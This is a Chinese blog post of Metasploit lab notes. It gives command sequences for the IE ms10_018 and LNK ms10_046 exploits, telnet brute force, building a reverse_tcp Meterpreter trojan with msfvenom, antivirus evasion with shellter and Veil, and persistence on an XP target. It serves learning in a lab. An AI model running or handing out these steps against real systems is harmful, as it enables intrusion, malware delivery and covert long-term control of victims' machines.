博客
关于我
[渗透笔记][漏洞复现] msf初步
阅读量:346 次
发布时间:2019-03-04

本文共 1958 字,大约阅读时间需要 6 分钟。

msf利用浏览器漏洞渗透

这里利用IE6和漏洞ms10_018

原理:自己制作一个网上的资源,通过让目标主机访问这个资源,利用目标主机中浏览器的漏洞来共同导致被攻击的结果。

msfconsole启动msf

search ms10_018查看相关漏洞

use exploit/windows/browser/ms10_018_ie_behaviors选择相应模块
set LHOST 192.168.223.140
set URIPATH test

set PAYLOAD windows/meterpreter/reverse_tcp设置payload模块

set SRVHOST 192.168.223.140设置反弹到的ip
exploit
生成网页链接,被攻击机使用ie有浏览器漏洞访问这个链接后,kali中显示攻击成功,
sessions -l 查看会话
seesions -i id 选择id

shell命令转到被攻击机的终端中,可以进行相关操作。


msf利用快捷方式漏洞

原理: 利用系统解析后缀名的机制,恶意构造一个lnk(快捷方式)的文件,并构造一串程序代码来欺骗操作系统,的那个shell32.dll解析到这串编码的时候,会认为这个快捷方式依赖一个系统dll,并把这个dll加载到内存中,如果加载的这个dll是一个病毒,那就把病毒激活了。

这个漏洞的危害性表现在不需要执行文件,而是只要一访问,系统就会自动对它进行解析,并加载"dll"从而中招

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

set PAYLPAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.88.227
set LHOST 192.168.88.227
exploit


msf对telnet爆破

原理;弱口令爆破,msf自带字典

use auxiliary/scanner/telnet/telnet_login

set RHOSTS 192.168.223.130
show options
set username jgc
set pass_file /root/myfile/pass.txt
exploit


msf监听并反弹payload

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp
set LHOST 本机ip


msf生成木马文件

原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用被攻击机打开会就会中马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=12345 -f exe > /root/test.exe生成木马文件 (本机ip和端口)

use exploit/multi/handler进入监听模块

set payload windows/meterpreter/reverse_tcp设置反弹payload
set LHOST ip (要监听的本地IP)
set LPORT port(要监听本地端口)

当被攻击及执行木马文件后,就会在msf监听下有相应,通过shell命令可以进入shell环境。


msf木马免杀

原理: 首先生成木马文件,然后将生成的木马文件与shellter免杀工具捆绑,然后设置监听,将捆绑后的文件拷贝到被攻击系统中,双击后,发现攻击成功。

apt-get install shellter 下载shellter

cd shellter
wine shellter.exe
A
/root/test.exe
在网上找到的就是这几条命令,但是本地环境搭建时出问题了没能成功


msf持续控制

使用到veil

veil-evasion 打开veil

use 使用use模块
set LHOST 本机ip
set LPORT 1234(本机端口任意)
test 设置输出的文件名
到这里会生成免杀木马文件

把文件拷贝到xp里

进入console

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ip
set LPORT 1234
exploit

xp运行木马文件,msf中最出现反弹shell

msf中命令:run persistence -U -i 5 -r ip -p 1234

reboot xp重启
run 建立持久链接

转载地址:http://rwnh.baihongyu.com/

你可能感兴趣的文章
mysql加入安装策略_一键安装mysql5.7及密码策略修改方法
查看>>
mysql加强(1)~用户权限介绍、分别使用客户端工具和命令来创建用户和分配权限
查看>>
mysql加强(3)~分组(统计)查询
查看>>
mysql加强(4)~多表查询:笛卡尔积、消除笛卡尔积操作(等值、非等值连接),内连接(隐式连接、显示连接)、外连接、自连接
查看>>
mysql加强(5)~DML 增删改操作和 DQL 查询操作
查看>>
mysql加强(6)~子查询简单介绍、子查询分类
查看>>
mysql加强(7)~事务、事务并发、解决事务并发的方法
查看>>
mysql千万级大数据SQL查询优化
查看>>
MySQL千万级大表优化策略
查看>>
MySQL单实例或多实例启动脚本
查看>>
MySQL压缩包方式安装,傻瓜式教学
查看>>
MySQL原理、设计与应用全面解析
查看>>
MySQL原理简介—1.SQL的执行流程
查看>>
MySQL参数调优详解
查看>>
mysql参考触发条件_MySQL 5.0-触发器(参考)_mysql
查看>>
MySQL及navicat for mysql中文乱码
查看>>
MySqL双机热备份(二)--MysqL主-主复制实现
查看>>
MySql各种查询
查看>>
mysql同主机下 复制一个数据库所有文件到另一个数据库
查看>>
mysql启动以后会自动关闭_驾照虽然是C1,一直是开自动挡的车,会不会以后就不会开手动了?...
查看>>